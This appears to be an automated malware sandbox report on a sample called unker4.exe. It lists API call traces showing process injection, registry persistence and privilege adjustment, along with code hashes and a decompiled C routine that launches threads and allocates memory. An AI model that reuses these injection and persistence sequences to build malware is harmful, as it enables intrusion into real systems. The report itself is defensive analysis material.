    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:0520E2BE92296DE286739115ACA14892
Total matches:158
Initial sample Analysis ID:57932
Initial sample SHA 256:D4883169ADA9F2D88BB36D2A05634A56C26DF3CBEEDF9D8A2DA073CDB049F46D
Initial sample name:unker4.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			// Orchestrator: records the heap handle (0x40305c) and a shared context (_v28), then starts
			// the mailslot reader thread (E00401034, the E00401033 routine below) and the writer thread
			// (E004010FB). It waits for the writer first; a non-zero writer exit code terminates the
			// reader, otherwise it waits for the reader and hands the received buffer (pointer and
			// length in the context) to E00401593, which calls VirtualAlloc. Returns the first error.
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
